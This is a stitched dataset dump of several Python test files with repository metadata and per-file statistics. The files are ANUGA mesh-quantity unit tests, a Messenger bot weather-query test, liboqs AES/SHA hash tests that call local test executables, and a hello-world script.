assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limit_edges_by_neighbour(self):
quantity = Quantity(self.mesh4)
#Create a deliberate overshoot (e.g. from gradient computation)
quantity.set_values([[3, 0, 3], [2, 2, 6], [5, 3, 8], [8, 3, 5]])
#Limit
quantity.limit_edges_by_neighbour()
#Assert that central triangle is limited by neighbours
assert quantity.edge_values[1, 0] <= quantity.centroid_values[3]
assert quantity.edge_values[1, 0] >= quantity.centroid_values[1]
assert quantity.edge_values[1, 1] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 1] >= quantity.centroid_values[1]
assert quantity.edge_values[1, 2] <= quantity.centroid_values[1]
assert quantity.edge_values[1, 2] >= quantity.centroid_values[0]
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limiter2(self):
"""Taken from test_shallow_water
"""
quantity = Quantity(self.mesh4)
quantity.domain.beta_w = 0.9
#Test centroids
quantity.set_values([2., 4., 8., 2.], location='centroids')
assert num.allclose(quantity.centroid_values, [2, 4, 8, 2]) # Centroid
#Extrapolate
quantity.extrapolate_second_order()
assert num.allclose(quantity.vertex_values[1, :], [0.0, 6, 6])
#Limit
quantity.limit()
# limited value for beta_w = 0.9
assert num.allclose(quantity.vertex_values[1, :], [2.2, 4.9, 4.9])
# limited values for beta_w = 0.5
#assert allclose(quantity.vertex_values[1,:], [3.0, 4.5, 4.5])
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_distribute_first_order(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Extrapolate from centroid to vertices and edges
quantity.extrapolate_first_order()
#Interpolate
#quantity.interpolate_from_vertices_to_edges()
assert num.allclose(quantity.vertex_values,
[[1, 1, 1], [2, 2, 2], [3, 3, 3], [4, 4, 4]])
assert num.allclose(quantity.edge_values, [[1, 1, 1], [2, 2, 2],
[3, 3, 3], [4, 4, 4]])
def test_interpolate_from_vertices_to_edges(self):
quantity = Quantity(self.mesh4)
quantity.vertex_values = num.array(
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]], float)
quantity.interpolate_from_vertices_to_edges()
assert num.allclose(quantity.edge_values, [[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]])
def test_interpolate_from_edges_to_vertices(self):
quantity = Quantity(self.mesh4)
quantity.edge_values = num.array([[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]], float)
quantity.interpolate_from_edges_to_vertices()
assert num.allclose(quantity.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
def test_distribute_second_order(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([2., 4., 8., 2.], location='centroids')
assert num.allclose(quantity.centroid_values, [2, 4, 8, 2]) # Centroid
#Extrapolate
quantity.extrapolate_second_order()
assert num.allclose(quantity.vertex_values[1, :], [0.0, 6, 6])
def test_update_explicit(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Set explicit_update
quantity.explicit_update = num.array([1., 1., 1., 1.])
#Update with given timestep
quantity.update(0.1)
x = num.array([1, 2, 3, 4]) + num.array([.1, .1, .1, .1])
assert num.allclose(quantity.centroid_values, x)
def test_update_semi_implicit(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Set semi implicit update
quantity.semi_implicit_update = num.array([1., 1., 1., 1.])
#Update with given timestep
timestep = 0.1
quantity.update(timestep)
sem = old_div(num.array([1., 1., 1., 1.]),num.array([1, 2, 3, 4]))
denom = num.ones(4, float)-timestep*sem
x = old_div(num.array([1, 2, 3, 4]),denom)
assert num.allclose(quantity.centroid_values, x)
def test_both_updates(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Set explicit_update
quantity.explicit_update = num.array([4., 3., 2., 1.])
#Set semi implicit update
quantity.semi_implicit_update = num.array([1., 1., 1., 1.])
#Update with given timestep
timestep = 0.1
quantity.update(0.1)
sem = old_div(num.array([1., 1., 1., 1.]),num.array([1, 2, 3, 4]))
denom = num.ones(4, float)-timestep*sem
x = num.array([1., 2., 3., 4.])
x += timestep*num.array([4.0, 3.0, 2.0, 1.0])
x /= denom
assert num.allclose(quantity.centroid_values, x)
def set_array_values_by_index(self):
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 1)
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2]])
value = [7]
indices = [1]
quantity.set_array_values_by_index(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [1, 7])
quantity.set_array_values([15, 20, 25], indices=indices)
assert num.allclose(quantity.centroid_values, [1, 20])
quantity.set_array_values([15, 20, 25], indices=indices)
assert num.allclose(quantity.centroid_values, [1, 20])
def test_setting_some_vertex_values(self):
"""
set values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "vertices",vertices
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
# Check that constants work
value = 7
indices = [1]
quantity.set_values(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [1, 7, 3, 4, 5, 6])
value = [7]
indices = [1]
quantity.set_values(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [1, 7, 3, 4, 5, 6])
value = [[15, 20, 25]]
quantity.set_values(value, indices=indices)
#print "1 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values[1], value[0])
#print "quantity",quantity.vertex_values
values = [10, 100, 50]
quantity.set_values(values, indices=[0, 1, 5], location='centroids')
#print "2 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values[0], [10, 10, 10])
assert num.allclose(quantity.vertex_values[5], [50, 50, 50])
#quantity.interpolate()
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [10, 100, 3, 4, 5, 50])
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
values = [10, 100, 50]
#this will be per unique vertex, indexing the vertices
#print "quantity.vertex_values",quantity.vertex_values
quantity.set_values(values, indices=[0, 1, 5])
#print "quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values[0], [1, 50, 10])
assert num.allclose(quantity.vertex_values[5], [6, 6, 6])
assert num.allclose(quantity.vertex_values[1], [100, 10, 50])
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
values = [[31, 30, 29], [400, 400, 400], [1000, 999, 998]]
quantity.set_values(values, indices=[3, 3, 5])
quantity.interpolate()
assert num.allclose(quantity.centroid_values, [1, 2, 3, 400, 5, 999])
values = [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]]
quantity.set_values(values)
# testing the standard set values by vertex
# indexed by vertex_id in general_mesh.coordinates
values = [0, 1, 2, 3, 4, 5, 6, 7]
quantity.set_values(values)
#print "1 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values, [[4., 5., 0.],
[1., 0., 5.],
[5., 6., 1.],
[2., 1., 6.],
[6., 7., 2.],
[3., 2., 7.]])
def test_setting_unique_vertex_values(self):
"""
set values based on unique_vertex lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "vertices",vertices
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
value = 7
indices = [1, 5]
quantity.set_values(value,
location='unique vertices',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.vertex_values[0], [0, 7, 0])
assert num.allclose(quantity.vertex_values[1], [7, 1, 7])
assert num.allclose(quantity.vertex_values[2], [7, 2, 7])
def test_get_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(location = 'unique vertices')
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(indices=[0,1,2,3,4,5,6,7], \
# location = 'unique vertices')
answer = [0.5, 2, 4, 5, 0, 1, 3, 4.5]
assert num.allclose(answer,
quantity.get_values(location='unique vertices'))
indices = [0, 5, 3]
answer = [0.5, 1, 5]
assert num.allclose(answer,
quantity.get_values(indices=indices,
location='unique vertices'))
#print "quantity.centroid_values",quantity.centroid_values
#print "quantity.get_values(location = 'centroids') ",\
# quantity.get_values(location = 'centroids')
def test_get_values_2(self):
"""Different mesh (working with domain object) - also check centroids.
"""
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices)
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
assert num.allclose(quantity.get_values(location='centroids'),
[2, 4, 4, 6])
assert num.allclose(quantity.get_values(location='centroids',
indices=[1, 3]), [4, 6])
assert num.allclose(quantity.get_values(location='vertices'),
[[4, 0, 2],
[4, 2, 6],
[6, 2, 4],
[8, 4, 6]])
assert num.allclose(quantity.get_values(location='vertices',
indices=[1, 3]), [[4, 2, 6],
[8, 4, 6]])
assert num.allclose(quantity.get_values(location='edges'),
[[1, 3, 2],
[4, 5, 3],
[3, 5, 4],
[5, 7, 6]])
assert num.allclose(quantity.get_values(location='edges',
indices=[1, 3]),
[[4, 5, 3],
[5, 7, 6]])
# Check averaging over vertices
#a: 0
#b: (4+4+4)/3
#c: (2+2+2)/3
#d: 8
#e: (6+6+6)/3
#f: 4
assert num.allclose(quantity.get_values(location='unique vertices'),
[0, 4, 2, 8, 6, 4])
def test_get_vertex_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
#======================================================
# Default: get_vertex_values just returns the individual
# vertex values within each triangle
#======================================================
Q, V = quantity.get_vertex_values(xy=False)
answer = [0., 0., 0., 1., 1., 1., 2., 2., 2., 3., 3., 3., 4.,
4., 4., 5., 5., 5.]
v_answer = num.array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
[12, 13, 14],
[15, 16, 17]])
assert num.allclose(answer, Q)
assert num.allclose(v_answer, V)
#======================================================
# Set output to be smooth, so get one unique value at
# each node. V now provides id to unique node id
#======================================================
domain.smooth = True
Q, V = quantity.get_vertex_values(xy=False)
answer = num.array([0.5, 2, 4, 5, 0, 1, 3, 4.5])
v_answer = num.array([[4, 5, 0],
[1, 0, 5],
[5, 6, 1],
[2, 1, 6],
[6, 7, 2],
[3, 2, 7]])
assert num.allclose(answer, Q)
assert num.allclose(v_answer, V)
#======================================================
# Set output to be smooth, and if using discontinuous
# algorithms, get one unique value at
# each node, based on centroid values.
# V now provides id to unique node id
#======================================================
domain.smooth = True
domain.using_discontinuous_elevation = True
quantity.centroid_values[:] = num.array([100, 101, 102, 103, 104, 105])
Q, V = quantity.get_vertex_values(xy=False)
answer = answer + 100.0
v_answer = num.array([[4, 5, 0],
[1, 0, 5],
[5, 6, 1],
[2, 1, 6],
[6, 7, 2],
[3, 2, 7]])
assert num.allclose(answer, Q)
assert num.allclose(v_answer, V)
def test_get_interpolated_values(self):
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
domain = Generic_Domain(points, vertices, boundary)
#Constant values
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
# Get interpolated values at centroids
interpolation_points = domain.get_centroid_coordinates()
answer = quantity.get_values(location='centroids')
#print quantity.get_values(points=interpolation_points)
assert num.allclose(answer, quantity.get_values(
interpolation_points=interpolation_points))
#Arbitrary values
quantity = Quantity(domain, [[0, 1, 2], [3, 1, 7], [2, 1, 2], [3, 3, 7],
[1, 4, -9], [2, 5, 0]])
# Get interpolated values at centroids
interpolation_points = domain.get_centroid_coordinates()
answer = quantity.get_values(location='centroids')
#print answer
#print quantity.get_values(interpolation_points=interpolation_points)
assert num.allclose(answer,
quantity.get_values(interpolation_points=interpolation_points,
verbose=False))
#FIXME TODO
#indices = [0,5,3]
#answer = [0.5,1,5]
#assert allclose(answer,
# quantity.get_values(indices=indices, \
# location = 'unique vertices'))
def test_get_interpolated_values_2(self):
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices)
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
#First pick one point
x, y = 2.0/3, 8.0/3
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 6)
# Then another to test that algorithm won't blindly
# reuse interpolation matrix
x, y = 4.0/3, 4.0/3
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 4)
def test_get_interpolated_values_with_georef(self):
zone = 56
xllcorner = 308500
yllcorner = 6189000
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices,
geo_reference=Geo_reference(zone, xllcorner, yllcorner))
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
#First pick one point (and turn it into absolute coordinates)
x, y = 2.0/3, 8.0/3
v = quantity.get_values(interpolation_points=[
[x+xllcorner, y+yllcorner]])
assert num.allclose(v, 6)
# Then another to test that algorithm won't blindly
# reuse interpolation matrix
x, y = 4.0/3, 4.0/3
v = quantity.get_values(interpolation_points=[
[x+xllcorner, y+yllcorner]])
assert num.allclose(v, 4)
# Try two points
pts = [[2.0/3 + xllcorner, 8.0/3 + yllcorner],
[4.0/3 + xllcorner, 4.0/3 + yllcorner]]
v = quantity.get_values(interpolation_points=pts)
assert num.allclose(v, [6, 4])
# Test it using the geospatial data format with absolute input points and default georef
pts = Geospatial_data(data_points=pts)
v = quantity.get_values(interpolation_points=pts)
assert num.allclose(v, [6, 4])
# Test it using the geospatial data format with relative input points
pts = Geospatial_data(data_points=[[2.0/3, 8.0/3], [4.0/3, 4.0/3]],
geo_reference=Geo_reference(zone, xllcorner, yllcorner))
v = quantity.get_values(interpolation_points=pts)
assert num.allclose(v, [6, 4])
def test_getting_some_vertex_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
value = [7]
indices = [1]
quantity.set_values(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
#print "quantity.get_values(location = 'centroids') ",\
# quantity.get_values(location = 'centroids')
assert num.allclose(quantity.centroid_values,
quantity.get_values(location='centroids'))
value = [[15, 20, 25]]
quantity.set_values(value, indices=indices)
#print "1 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values, quantity.get_values())
assert num.allclose(quantity.edge_values,
quantity.get_values(location='edges'))
# get a subset of elements
subset = quantity.get_values(location='centroids', indices=[0, 5])
answer = [quantity.centroid_values[0], quantity.centroid_values[5]]
assert num.allclose(subset, answer)
subset = quantity.get_values(location='edges', indices=[0, 5])
answer = [quantity.edge_values[0], quantity.edge_values[5]]
#print "subset",subset
#print "answer",answer
assert num.allclose(subset, answer)
subset = quantity.get_values(indices=[1, 5])
answer = [quantity.vertex_values[1], quantity.vertex_values[5]]
#print "subset",subset
#print "answer",answer
assert num.allclose(subset, answer)
def test_smooth_vertex_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
# from anuga.shallow_water.shallow_water_domain import Domain
#Create basic mesh
points, vertices, boundary = rectangular(2, 2)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6], [7, 7, 7]])
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(location = 'unique vertices')
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(indices=[0,1,2,3,4,5,6,7], \
# location = 'unique vertices')
#print quantity.get_values(location = 'unique vertices')
#print quantity.domain.number_of_triangles_per_node
#print quantity.vertex_values
#answer = [0.5, 2, 3, 3, 3.5, 4, 4, 5, 6.5]
#assert allclose(answer,
# quantity.get_values(location = 'unique vertices'))
quantity.smooth_vertex_values()
#print quantity.vertex_values
answer_vertex_values = [[3, 3.5, 0.5], [2, 0.5, 3.5], [3.5, 4, 2], [3, 2, 4],
[4, 5, 3], [3.5, 3, 5], [5, 6.5, 3.5], [4, 3.5, 6.5]]
assert num.allclose(answer_vertex_values,
quantity.vertex_values)
# Just another (slightly larger) test of get_values
assert num.allclose(quantity.get_values(location='centroids'),
quantity.centroid_values)
assert num.allclose(quantity.get_values(location='vertices'),
quantity.vertex_values)
assert num.allclose(quantity.get_values(location='edges'),
quantity.edge_values)
def test_maximum(self):
quantity = Quantity(self.mesh4)
# get referece to data arrays
centroid_values = quantity.centroid_values
vertex_values = quantity.vertex_values
edge_values = quantity.edge_values
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert id(vertex_values) == id(quantity.vertex_values)
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
other_quantity = Quantity(self.mesh4)
other_quantity.set_values([[0, 0, 0], [1, 1, 6], [10, 10, 10], [0, 0, 4]],
location='vertices')
#===============================
quantity.maximum(other_quantity)
#===============================
exact_vertex_values = num.array([[1., 2., 3.],
[5., 5., 6.],
[10., 10., 10.],
[0., 3., 4.]])
exact_centroid_values = num.array([2., 5., 10., 1.33333333])
exact_edge_values = num.array([[2.5, 2., 1.5],
[5., 5., 5., ],
[10., 10., 10.],
[3., 2., 0.]])
assert num.allclose(quantity.vertex_values,
exact_vertex_values)
assert num.allclose(quantity.centroid_values,
exact_centroid_values) # Centroid
assert num.allclose(quantity.edge_values, exact_edge_values)
def test_minimum(self):
quantity = Quantity(self.mesh4)
# get referece to data arrays
centroid_values = quantity.centroid_values
vertex_values = quantity.vertex_values
edge_values = quantity.edge_values
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert id(vertex_values) == id(quantity.vertex_values)
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
other_quantity = Quantity(self.mesh4)
other_quantity.set_values([[0, 0, 0], [1, 1, 6], [10, 10, 10], [0, 0, 4]],
location='vertices')
#===============================
quantity.minimum(other_quantity)
#===============================
exact_vertex_values = num.array([[0., 0., 0.],
[1., 1., 5.],
[0., 0., 9.],
[-6., 0., 3.]])
exact_centroid_values = num.array([0., 2.66666667, 3., 0.])
exact_edge_values = num.array([[0., 0., 0.],
[3.5, 3.5, 1., ],
[4.5, 4.5, 0.],
[2., -1.5, -1.5]])
assert num.allclose(quantity.vertex_values,
exact_vertex_values)
assert num.allclose(quantity.centroid_values,
exact_centroid_values) # Centroid
assert num.allclose(quantity.edge_values, exact_edge_values)
#-------------------------------------------------------------
if __name__ == "__main__":
# _set_values_from_asc')
suite = unittest.makeSuite(Test_Quantity, 'test_')
runner = unittest.TextTestRunner(verbosity=1)
runner.run(suite)
| 37.249198
| 96
| 0.520032
| 12,897
| 104,484
| 4.083585
| 0.046445
| 0.061975
| 0.081666
| 0.073577
| 0.831314
| 0.795751
| 0.777371
| 0.740003
| 0.705256
| 0.682661
| 0
| 0.089356
| 0.347173
| 104,484
| 2,804
| 97
| 37.262482
| 0.682759
| 0.159383
| 0
| 0.660218
| 0
| 0
| 0.016185
| 0.000403
| 0
| 0
| 0
| 0.00107
| 0.17896
| 1
| 0.047158
| false
| 0.004232
| 0.026602
| 0.003023
| 0.078597
| 0.005441
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3189197c2934f8cd2261e7516806da385083c85d
| 339
|
py
|
Python
|
modules/tests/test_weather.py
|
anamayagarodia/JARVIS-on-Messenger
|
d7198db0afe99cf3c0f7aacd5d5a16641deba809
|
[
"MIT"
] | 6
|
2017-05-17T23:46:16.000Z
|
2017-05-18T19:50:15.000Z
|
modules/tests/test_weather.py
|
anamayagarodia/JARVIS-on-Messenger
|
d7198db0afe99cf3c0f7aacd5d5a16641deba809
|
[
"MIT"
] | null | null | null |
modules/tests/test_weather.py
|
anamayagarodia/JARVIS-on-Messenger
|
d7198db0afe99cf3c0f7aacd5d5a16641deba809
|
[
"MIT"
] | 2
|
2018-08-06T06:03:58.000Z
|
2020-01-08T07:57:37.000Z
|
import modules
def test_weather():
assert('weather' == modules.process_query('tell me the weather in London')[0])
assert('weather' == modules.process_query('weather Delhi')[0])
assert('weather' == modules.process_query('What\'s the weather in Texas?')[0])
assert('weather' != modules.process_query('something random')[0])
| 42.375
| 82
| 0.699115
| 45
| 339
| 5.155556
| 0.444444
| 0.224138
| 0.344828
| 0.465517
| 0.564655
| 0.426724
| 0
| 0
| 0
| 0
| 0
| 0.013559
| 0.129794
| 339
| 7
| 83
| 48.428571
| 0.772881
| 0
| 0
| 0
| 0
| 0
| 0.268437
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0.166667
| true
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
31945cb30edaf65a600a39ecfec83118ba06e341
| 1,857
|
py
|
Python
|
tests/test_hash.py
|
MicrohexHQ/liboqs
|
6340a0ba71f66ad494ede00d38f358b2a4546164
|
[
"MIT"
] | null | null | null |
tests/test_hash.py
|
MicrohexHQ/liboqs
|
6340a0ba71f66ad494ede00d38f358b2a4546164
|
[
"MIT"
] | null | null | null |
tests/test_hash.py
|
MicrohexHQ/liboqs
|
6340a0ba71f66ad494ede00d38f358b2a4546164
|
[
"MIT"
] | 1
|
2020-10-12T13:30:00.000Z
|
2020-10-12T13:30:00.000Z
|
import hashlib
import helpers
import pytest
import sys
@helpers.filtered_test
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_aes():
helpers.run_subprocess(
[helpers.path_to_executable('test_aes')],
)
@helpers.filtered_test
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha3():
helpers.run_subprocess(
[helpers.path_to_executable('test_sha3')],
)
@helpers.filtered_test
@pytest.mark.parametrize('msg', ['', 'a', 'abc', '1234567890123456789012345678901678901567890'])
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha256(msg):
output = helpers.run_subprocess(
[helpers.path_to_executable('test_hash'), 'sha256'],
input = msg.encode(),
)
assert(output.rstrip() == hashlib.sha256(msg.encode()).hexdigest())
@helpers.filtered_test
@pytest.mark.parametrize('msg', ['', 'a', 'abc', '1234567890123456789012345678901678901567890'])
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha384(msg):
output = helpers.run_subprocess(
[helpers.path_to_executable('test_hash'), 'sha384'],
input = msg.encode(),
)
assert(output.rstrip() == hashlib.sha384(msg.encode()).hexdigest())
@helpers.filtered_test
@pytest.mark.parametrize('msg', ['', 'a', 'abc', '1234567890123456789012345678901678901567890'])
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha512(msg):
output = helpers.run_subprocess(
[helpers.path_to_executable('test_hash'), 'sha512'],
input = msg.encode(),
)
assert(output.rstrip() == hashlib.sha512(msg.encode()).hexdigest())
if __name__ == "__main__":
import sys
pytest.main(sys.argv)
| 34.388889
| 96
| 0.706516
| 215
| 1,857
| 5.925581
| 0.204651
| 0.062794
| 0.074568
| 0.098116
| 0.867347
| 0.867347
| 0.867347
| 0.77551
| 0.701727
| 0.701727
| 0
| 0.097893
| 0.130856
| 1,857
| 53
| 97
| 35.037736
| 0.69145
| 0
| 0
| 0.5
| 0
| 0
| 0.191272
| 0.069504
| 0
| 0
| 0
| 0
| 0.065217
| 1
| 0.108696
| false
| 0
| 0.108696
| 0
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
31c40436b83c2b1b5cf6a031de834bad6a5aeb45
| 30
|
py
|
Python
|
hello.py
|
AleksandrTheFirst/pythonTests
|
0c1d7e10ccf34f633d5aea15f039fa6e434c494f
|
[
"Apache-2.0"
] | null | null | null |
hello.py
|
AleksandrTheFirst/pythonTests
|
0c1d7e10ccf34f633d5aea15f039fa6e434c494f
|
[
"Apache-2.0"
] | null | null | null |
hello.py
|
AleksandrTheFirst/pythonTests
|
0c1d7e10ccf34f633d5aea15f039fa6e434c494f
|
[
"Apache-2.0"
] | null | null | null |
print("Hello from Aleksandr")
| 15
| 29
| 0.766667
| 4
| 30
| 5.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
